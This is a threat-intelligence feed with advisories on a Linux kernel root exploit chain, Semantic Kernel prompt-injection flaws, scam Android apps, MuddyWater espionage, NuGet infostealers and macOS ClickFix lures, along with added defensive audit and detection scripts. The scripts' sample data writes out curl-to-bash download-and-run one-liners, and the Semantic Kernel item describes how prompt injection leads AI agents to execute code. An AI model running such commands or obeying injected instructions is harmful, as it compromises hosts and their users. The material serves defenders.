TIGR Threat Watch

Threat Watch Feed

🚩 – IOCs Added

The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.

Dirty Frag Linux Kernel Vulnerability Chain Enables Local Root Privilege Escalation Across Major Distributions

Details were released for Dirty Frag, a Linux kernel local privilege escalation vulnerability chain that can allow an unprivileged local user to gain root access across major Linux distributions. The issue chains two page-cache write vulnerabilities in the xfrm-ESP/IPsec and RxRPC kernel paths, extending the same broader bug class as Dirty Pipe and Copy Fail. Public reporting notes that the embargo was broken before coordinated fixes were available across distributions, increasing urgency because exploit details and working proof-of-concept code were released publicly.

The vulnerability is considered especially concerning because it is described as deterministic rather than race-condition based, meaning exploitation does not rely on fragile timing and may be highly reliable when the required kernel interfaces are reachable. Reports note potential impact across Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, and Fedora 44. The xfrm-ESP issue has been assigned CVE-2026-43284 and patched in mainline, while the RxRPC issue has been assigned CVE-2026-43500, with patch availability still limited at the time of reporting.

Impact: Successful exploitation may allow a local, unprivileged user to gain root privileges on affected Linux systems. This creates increased risk for multi-user servers, developer systems, shared hosting environments, and container platforms that run untrusted or third-party workloads. In containerized environments, Dirty Frag may also increase the risk of container escape scenarios where vulnerable kernel interfaces are exposed or where workload isolation is not sufficiently hardened.

Recommendation: Organizations should monitor vendor advisories and apply kernel updates as soon as patches are available for affected distributions. Until patches are deployed, access to the affected kernel paths should be reduced by preventing the vulnerable esp4, esp6, and rxrpc modules from loading where they are not required. Linux systems should be reviewed for local users or workloads with access to vulnerable interfaces, especially systems allowing untrusted shell access, shared development activity, or container workloads. Container environments should enforce hardened defaults such as restrictive seccomp, AppArmor or SELinux profiles, reduced capabilities, and limited access to kernel networking features. Systems with suspected exploitation should be investigated for unauthorized root-level changes, modified authentication files, unexpected setuid binaries, persistence artifacts, and suspicious activity from low-privileged accounts.
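The module lockout recommended above can be audited with a short script. This is an added example, not code from the advisory or any vendor: it classifies esp4, esp6 and rxrpc from modprobe.d text and /proc/modules text. It assumes the three are built as loadable modules (a built-in cannot be blocked through modprobe), and the function names and sample data are illustrative.

```python
import glob
import re
from pathlib import Path

TARGETS = ("esp4", "esp6", "rxrpc")  # modules named in the recommendation above
INSTALL_OFF = re.compile(r"install\s+(\S+)\s+(?:/usr)?/bin/(?:false|true)\s*$")
BLACKLIST = re.compile(r"blacklist\s+(\S+)\s*$")
CONF_DIRS = ("/etc/modprobe.d", "/run/modprobe.d", "/usr/lib/modprobe.d", "/lib/modprobe.d")


def audit_module_lockout(modprobe_conf: str, proc_modules: str) -> dict:
    """Classify each target module.

    loaded     - present in the running kernel; config changes do not unload it
    blocked    - `install <mod> /bin/false` (or /bin/true) runs instead of a load
    alias-only - only `blacklist <mod>`: alias-based autoload is stopped, but
                 `modprobe <mod>` by name or as a dependency still works
    loadable   - nothing in the config prevents loading
    """
    loaded = {ln.split()[0] for ln in proc_modules.splitlines() if ln.strip()}
    disabled, blacklisted = set(), set()
    for raw in modprobe_conf.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        for pattern, bucket in ((INSTALL_OFF, disabled), (BLACKLIST, blacklisted)):
            m = pattern.match(line)
            if m:
                bucket.add(m.group(1).replace("-", "_"))  # modprobe treats - and _ alike
    report = {}
    for mod in TARGETS:
        if mod in loaded:
            report[mod] = "loaded"
        elif mod in disabled:
            report[mod] = "blocked"
        elif mod in blacklisted:
            report[mod] = "alias-only"
        else:
            report[mod] = "loadable"
    return report


def audit_live_host() -> dict:
    """Run the audit against this machine's modprobe.d directories and /proc/modules."""
    files = sorted(p for d in CONF_DIRS for p in glob.glob(d + "/*.conf"))
    conf = "\n".join(Path(p).read_text(errors="replace") for p in files)
    return audit_module_lockout(conf, Path("/proc/modules").read_text())


# Constructed sample input, not taken from a real host.
SAMPLE_CONF = """\
# /etc/modprobe.d/dirtyfrag.conf
install esp4 /bin/false
blacklist esp6
# install rxrpc /bin/false
"""
SAMPLE_PROC = """\
rxrpc 450560 0 - Live 0x0000000000000000
ip_tables 32768 0 - Live 0x0000000000000000
"""

if __name__ == "__main__":
    print(audit_module_lockout(SAMPLE_CONF, SAMPLE_PROC))
```

A module reported as loaded stays reachable until it is unloaded or the host reboots with the lockout in place.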

Semantic Kernel Vulnerabilities Could Allow Prompt Injection to Become Remote Code Execution

Microsoft reported two vulnerabilities in Semantic Kernel, CVE-2026-26030 and CVE-2026-25592, that could allow prompt injection against AI agents to escalate into host-level execution risks. The research highlights how AI agents connected to plugins or tools can introduce systemic risk when model-controlled parameters are passed into high-impact functions such as search filters, code execution plugins, file transfer helpers, or host filesystem operations.

CVE-2026-26030 affects Semantic Kernel Python versions before 1.39.4 when agents use the Search Plugin backed by the In-Memory Vector Store with default filter functionality. In that scenario, attacker-controlled prompt input could be interpolated into a Python lambda expression evaluated by the framework, allowing a crafted prompt to bypass blocklist-based validation and execute arbitrary code. CVE-2026-25592 affects Semantic Kernel .NET SDK versions before 1.71.0, where an exposed DownloadFileAsync function could allow AI-controlled file writes to arbitrary host paths, potentially enabling sandbox escape and persistence through locations such as the Windows Startup folder.

Impact: Successful exploitation could allow an attacker to move from prompt injection to code execution, arbitrary file write, sandbox escape, or host compromise depending on the vulnerable agent configuration. Affected agents may expose sensitive host files, write malicious payloads to persistence locations, spawn suspicious child processes, or execute commands from the agent host process. The risk is highest where AI agents process untrusted input and have access to plugins that interact with local files, code execution environments, search backends, or other system-level tools.

Recommendation: Organizations using Semantic Kernel should upgrade Python semantic-kernel deployments to version 1.39.4 or later and Semantic Kernel .NET SDK deployments to version 1.71.0 or later. AI agent tools should be reviewed to ensure model-controlled parameters are treated as untrusted input, especially for filesystem paths, code execution, search filters, shell commands, and upload/download functions. Existing deployments should be assessed for the vulnerable window before patching, with endpoint telemetry reviewed for suspicious child processes from agent hosts, unexpected outbound connections, unusual file writes, Startup folder modifications, or persistence artifacts. Agent architectures should limit exposed tools to the minimum required scope and enforce path allowlists, input validation, sandboxing, and host-level monitoring.
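Two guards of the kind recommended above, as an added example: a search filter accepted as data and checked against allowlists instead of being built into an expression string, and a file-write target confined to one directory. This is a generic illustration, not Semantic Kernel code or Microsoft's fix; the field names, function names and records are hypothetical.

```python
import operator
from pathlib import Path

ALLOWED_FIELDS = {"city", "category", "year"}  # hypothetical record fields
ALLOWED_OPS = {"eq": operator.eq, "ne": operator.ne,
               "lt": operator.lt, "gt": operator.gt}


def compile_filter(spec):
    """Turn a model-supplied filter into a predicate without eval() or string building."""
    if not isinstance(spec, dict) or set(spec) != {"field", "op", "value"}:
        raise ValueError("filter must be an object with exactly field, op, value")
    field, op, value = spec["field"], spec["op"], spec["value"]
    if not isinstance(field, str) or field not in ALLOWED_FIELDS:
        raise ValueError("field is not allowlisted")
    if not isinstance(op, str) or op not in ALLOWED_OPS:
        raise ValueError("operator is not allowlisted")
    if type(value) not in (str, int, float):
        raise ValueError("value must be a plain string or number")
    compare = ALLOWED_OPS[op]

    def predicate(record):
        have = record.get(field)
        # A missing field or a type mismatch never matches and never raises.
        return type(have) is type(value) and compare(have, value)

    return predicate


def search(records, spec):
    """Apply a validated filter; the model's text is only ever compared, never run."""
    keep = compile_filter(spec)
    return [r for r in records if keep(r)]


def confine_path(root, requested):
    """Resolve a model-supplied file name and refuse anything outside root."""
    base = Path(root).resolve()
    target = (base / requested).resolve()  # collapses "..", follows symlinks
    if base not in target.parents:         # also rejects root itself and absolute paths
        raise PermissionError(f"path escapes the allowed directory: {requested!r}")
    return target


# Constructed sample records.
RECORDS = [
    {"city": "Paris", "category": "hotel", "year": 2021},
    {"city": "Oslo", "category": "hotel", "year": 2024},
]

if __name__ == "__main__":
    print(search(RECORDS, {"field": "year", "op": "gt", "value": 2022}))
    print(confine_path("/srv/agent-downloads", "reports/q1.pdf"))
```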

🚩 CallPhantom Fraudulent Apps Scam Over 7 Million Android Users with Fake Call Log Services

ESET researchers disclosed CallPhantom, a cluster of 28 fraudulent Android apps on Google Play collectively downloaded over 7.3 million times before removal, falsely claiming to provide call history, SMS records, and WhatsApp call logs for any phone number in exchange for payment. The apps primarily targeted users in India and Asia-Pacific regions, with India’s +91 country code preselected and support for UPI payment systems. Analysis revealed “call history” data is entirely fabricated, with apps generating random phone numbers matched with hardcoded names, call times, and durations embedded directly in code. Screenshots of fabricated data were included in app listings presented as functionality demonstrations.

The campaign utilized two main clusters: first cluster apps contained hardcoded names, country codes, and templates combined with randomly generated phone numbers shown as partial results requiring payment for full access; second cluster apps requested email addresses where “retrieved” call history would supposedly be delivered, with no data generation occurring until after payment. Payment methods violated Google Play policies, including subscriptions via official Google Play billing, third-party UPI payment apps with hardcoded or Firebase-fetched URLs allowing account changes, and direct payment card checkout forms embedded in apps. Subscription fees ranged from €5 to $80, with some apps displaying deceptive notifications styled as new emails claiming call history results had arrived to coax users into paying.

Impact: Apps do not request intrusive permissions and contain no functionality capable of retrieving real call, SMS, or WhatsApp data, as such retrieval is technically impossible without authorized access to telecommunications infrastructure. Some apps circumvented Google Play’s official billing system by pushing users toward third-party payments or direct card entry, complicating refund efforts and exposing victims to financial risk beyond Google’s refund protection. Users who subscribed via official Google Play billing may be eligible for refunds under Google’s policies, while purchases made via third-party payment apps or direct payment card entry cannot be refunded by Google, leaving users dependent on external payment providers or developers for recourse. The apps garnered numerous negative reviews from victims reporting scams and non-delivery of promised data.

Recommendation: Users who subscribed should cancel subscriptions through Google Play by tapping profile icons, navigating to Payments & subscriptions, selecting active subscriptions, and tapping Cancel subscription. Request refunds for Google Play purchases within allowed refund windows as described on Google’s support page, noting refund eligibility depends on time since purchase, item type, and Google’s refund policy. For purchases made outside Google Play through third-party services or direct card entry, contact payment providers or app developers directly as Google cannot cancel subscriptions or issue refunds for external payments. Organizations should educate users that retrieving call logs, SMS records, or messaging app histories for arbitrary phone numbers is technically impossible without authorized telecommunications infrastructure access. Report suspicious apps to Google through official channels when apps promise services requiring privileged access to telecommunications data without legitimate carrier partnerships.

🚩 State-backed MuddyWater masquerades as Chaos ransomware to enable stealthy espionage and data exfiltration

Researchers at Rapid7 reported in May 2026 that an intrusion initially attributed to Chaos ransomware was in fact a state-sponsored operation linked with moderate confidence to MuddyWater (Seedworm), affiliated with Iran’s Ministry of Intelligence and Security (MOIS). The attackers used a false-flag approach, leveraging Chaos ransomware branding to disguise espionage objectives. The campaign featured high-touch social engineering via Microsoft Teams, where attackers conducted live screen-sharing sessions to harvest credentials and manipulate MFA, followed by deployment of a custom RAT (“Game.exe”) and use of legitimate remote access tools.

The attack chain relied on interactive credential theft, RDP-based lateral movement, and persistence via tools like DWAgent and AnyDesk. A downloader (ms_upd.exe) fetched a trojanized WebView2-based RAT that communicated with C2 infrastructure and enabled command execution, file transfer, and long-term access. The operation skipped file encryption entirely, deviating from typical ransomware, and instead focused on data exfiltration and covert persistence, supported by infrastructure and code-signing artifacts previously tied to MuddyWater.

Impact: This campaign enables covert, long-term access to enterprise environments under the guise of ransomware, increasing the risk of undetected espionage, credential compromise, and data exfiltration. By blending criminal and state-sponsored tradecraft, attackers can delay detection, evade attribution, and maintain persistent footholds for follow-on operations or disruption.

Recommendation: Block or limit external Microsoft Teams chat requests, and train users to treat unsolicited “IT support” interactions as high risk, especially those involving screen sharing or credential entry. Enforce phishing-resistant MFA where possible and require step-up authentication for MFA changes or new device enrollment. Monitor for suspicious MFA resets or additions to user accounts. Limit use of remote access tools to approved systems only. Alert on new installations, unusual session origins, or remote access outside of normal hours. Block and alert on connections to known malicious domains and associated IPs. Proactively hunt for historical connections to known IOCs and investigate any host that is found in connection with them, even if no ransomware activity was observed.

🚩 Five Malicious NuGet Packages Impersonate Chinese .NET Libraries to Steal Developer Credentials, SSH Keys, and Cryptocurrency Wallets

Socket reported five malicious NuGet packages published by the account bmrxntfj that impersonate Chinese .NET UI and infrastructure libraries, including IR.DantUI, IR.Infrastructure.Core, IR.Infrastructure.DataService.Core, IR.iplus32, and IR.OscarUI. The packages contain functional .NET library code but include a .NET Reactor-protected infostealer payload that executes through a module initializer when the assembly is loaded, placing developer workstations, CI runners, and build servers at risk if the packages are restored and loaded in a .NET process. Across all versions, the packages have accumulated approximately 65,000 downloads, and Socket reported that the packages remained available on NuGet at the time of publication.

The campaign uses version rotation and unlisted package versions to reduce the usefulness of file-hash-based blocking, with 224 total versions observed across the five package IDs and 219 versions marked as unlisted while still remaining installable through direct version-pinned commands. The stealer targets browser credentials, cookies, session tokens, autofill data, payment data, cryptocurrency wallet extensions, desktop wallet files, SSH private keys, Outlook profiles, Steam session data, and files from common user directories. Stolen data is staged at C:\ProgramData\Microsoft OneDrive\keys.dat and exfiltrated to dns-providersa2[.]com, using randomized X-[a-z]{3} HTTP headers to complicate static network detection.

Impact: Successful execution may expose sensitive data from developer systems and CI/CD environments, including browser-saved credentials, authentication cookies, cloud or API credentials, SSH keys, cryptocurrency wallet data, Outlook profiles, Steam session data, and local files. Because the payload runs when the malicious assembly is loaded, affected build servers and developer workstations should be treated as potentially compromised even if the package appeared to function normally. The focus on NuGet dependencies also creates broader software supply chain risk, especially for organizations that rely on internal mirrors, private package naming conventions, or automated dependency restoration.

Recommendation: Organizations should search project files, package manifests, dependency lock files, build logs, and NuGet caches for IR.DantUI, IR.Infrastructure.Core, IR.Infrastructure.DataService.Core, IR.iplus32, or IR.OscarUI at any version. Systems that restored and loaded these packages should be investigated for credential exposure, with browser-saved passwords, session tokens, API keys, SSH private keys, cloud credentials, and cryptocurrency wallet secrets rotated where applicable. Monitoring should include DNS or outbound connections to dns-providersa2[.]com or 62[.]84[.]102[.]85, file creation at C:\ProgramData\Microsoft OneDrive\keys.dat, suspicious DLL loading from developer or CI environments, and outbound HTTP requests using randomized X-[a-z]{3} headers. Approved package sources and publishers should be validated, and malicious package IDs should be blocked across package managers, CI pipelines, and developer endpoints.
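The manifest search recommended above, as an added example (not Socket's tooling): it checks project files, packages.config and packages.lock.json for the five package IDs at any version, matching case-insensitively because NuGet IDs are case-insensitive, and reports transitive references from lock files. Function names, sample files and the version strings in them are constructed.

```python
import json
import os
import re

# Package IDs named in the report above, lowercased for comparison.
FLAGGED = {"ir.dantui", "ir.infrastructure.core",
           "ir.infrastructure.dataservice.core", "ir.iplus32", "ir.oscarui"}
MANIFEST_SUFFIXES = (".csproj", ".fsproj", ".vbproj", ".props", ".targets",
                     "packages.config", "packages.lock.json")
# <PackageReference/PackageVersion Include="X"> or packages.config <package id="X">
XML_REF = re.compile(
    r'<(?:PackageReference|PackageVersion)\b[^>]*?\b(?:Include|Update)\s*=\s*"([^"]+)"'
    r'|<package\b[^>]*?\bid\s*=\s*"([^"]+)"', re.IGNORECASE)


def find_flagged(filename: str, text: str) -> list:
    """Return sorted (package_id, how) pairs for flagged IDs referenced in one file."""
    hits = set()
    if filename.lower().endswith("packages.lock.json"):
        try:
            frameworks = json.loads(text).get("dependencies", {}).values()
            for framework in frameworks:
                for pkg_id, meta in framework.items():
                    if pkg_id.lower() in FLAGGED:
                        # "Direct" or "Transitive" as recorded by restore
                        hits.add((pkg_id, meta.get("type", "unknown").lower()))
        except (ValueError, AttributeError):
            return []  # malformed lock file: nothing reliable to report
    else:
        for m in XML_REF.finditer(text):
            pkg_id = m.group(1) or m.group(2)
            if pkg_id.lower() in FLAGGED:
                hits.add((pkg_id, "direct"))
    return sorted(hits)


def scan_tree(root: str) -> dict:
    """Walk a checkout or build workspace and map file path -> findings."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(MANIFEST_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig", errors="replace") as fh:
                    found = find_flagged(name, fh.read())
                if found:
                    findings[path] = found
    return findings


# Constructed samples; versions are placeholders, not versions from the report.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="ir.oscarui" Version="0.0.0" />
  </ItemGroup>
</Project>"""
SAMPLE_LOCK = json.dumps({"version": 1, "dependencies": {"net8.0": {
    "Contoso.Widgets": {"type": "Direct", "resolved": "1.0.0"},
    "IR.Infrastructure.Core": {"type": "Transitive", "resolved": "0.0.0"}}}})

if __name__ == "__main__":
    print(find_flagged("App.csproj", SAMPLE_CSPROJ))
    print(find_flagged("packages.lock.json", SAMPLE_LOCK))
```

A clean result here does not cover the NuGet caches or build logs, which the recommendation also lists.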

🚩 ClickFix Campaign Targets macOS Users With Fake Utility Lures to Deliver Infostealers and Cryptocurrency Wallet Trojans

Microsoft reported an evolving ClickFix-style campaign targeting macOS users through fake troubleshooting guides, blog posts, and utility-themed pages that claim to help with issues such as disk space optimization or system maintenance. Instead of delivering traditional .dmg installers, recent activity instructs users to paste Terminal commands that use native macOS utilities such as curl, Base64, Gunzip, Bash, and osascript to retrieve and execute remotely hosted scripts. Microsoft observed multiple delivery paths, including a loader install campaign, a script install campaign, and a helper install campaign, all focused on sensitive data collection, persistence, and exfiltration.

The campaigns deliver or support infostealers such as Macsync, Shub Stealer, and AMOS, which can collect browser credentials, Keychain entries, iCloud data, media files, documents, Telegram data, and cryptocurrency wallet artifacts. Some variants also replace legitimate cryptocurrency wallet applications, including Ledger Wallet, Trezor Suite, and Exodus, with attacker-controlled versions. The malware establishes persistence through LaunchAgents or LaunchDaemons, stages collected data under temporary directories such as /tmp/shub_<random ID>/, and uses C2 infrastructure for exfiltration and remote command execution.

Impact: Successful execution may allow attackers to steal macOS credentials, browser data, Keychain contents, iCloud information, documents, media files, Telegram data, and cryptocurrency wallet keys. The replacement of legitimate wallet applications with trojanized versions creates additional risk because users may continue transacting through compromised apps without realizing the wallet software has been altered. Persistence through LaunchAgents, LaunchDaemons, hidden helper files, and backdoor-style bot components may also allow continued remote access after initial data theft.

Recommendation: Organizations should educate macOS users not to run Terminal commands copied from untrusted websites, blogs, forums, ads, or troubleshooting pages. Monitoring should focus on suspicious Terminal or shell activity involving curl, Base64 decoding, Gunzip, osascript, dscl, archive creation under /tmp, and HTTP POST exfiltration following access to sensitive folders. macOS endpoints should be reviewed for suspicious LaunchAgents or LaunchDaemons, including ~/LaunchAgents/com.google.keystone.agent.plist, ~/Library/LaunchAgents/com.<random value>.plist, and /Library/LaunchDaemons/com.finder.helper.plist, as well as staged files or folders such as /tmp/helper, /tmp/starter, and ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate. Access to reported ClickFix distribution domains and C2 infrastructure should be blocked where applicable, and cryptocurrency wallet applications should be validated for unauthorized replacement, particularly Trezor Suite, Ledger Live, and Exodus, given the confirmed trojanization activity observed in this campaign.
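The shell-activity monitoring described above, as an added example (not Microsoft's detection logic): it scores shell command lines in which curl output is handed to an interpreter, and raises the severity when a Base64 or gzip decode sits in the chain. It assumes telemetry that records the full command line as typed; the event fields, host names and sample lines are constructed.

```python
import re

FETCH = re.compile(r"\bcurl\b")
DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b|\bgunzip\b|\bgzip\s+-d\b")
# Interpreter fed from a pipe, or `bash -c "$(...)"` command substitution.
EXEC = re.compile(r"\|\s*(?:\S*/)?(?:bash|sh|zsh|osascript)\b"
                  r"|\b(?:bash|sh|zsh)\s+-c\s+[\"']?\$\(")


def score_command(cmdline: str):
    """Return 'high', 'medium' or None for one shell command line.

    high   - remote fetch, a decode step, and an interpreter in one chain
    medium - remote fetch executed directly; some legitimate installers also
             do this, so these need analyst review rather than auto-blocking
    """
    if not (FETCH.search(cmdline) and EXEC.search(cmdline)):
        return None
    return "high" if DECODE.search(cmdline) else "medium"


def triage(events: list) -> list:
    """Return (host, severity) for every event that scores, in input order."""
    alerts = []
    for event in events:
        severity = score_command(event["cmdline"])
        if severity:
            alerts.append((event["host"], severity))
    return alerts


# Constructed sample telemetry; example.invalid never resolves.
SAMPLE_EVENTS = [
    {"host": "mac-01",
     "cmdline": "curl -fsSL https://cdn.example.invalid/clean.sh | base64 -D | gunzip | bash"},
    {"host": "mac-02", "cmdline": "curl -O https://example.invalid/notes.pdf"},
    {"host": "mac-03", "cmdline": "curl -s https://example.invalid/i | osascript"},
    {"host": "mac-04", "cmdline": 'bash -c "$(curl -fsSL https://example.invalid/setup)"'},
    {"host": "mac-05", "cmdline": "brew list | grep curl"},
]

if __name__ == "__main__":
    for host, severity in triage(SAMPLE_EVENTS):
        print(host, severity)
```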

About TIGR Threat Watch

Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.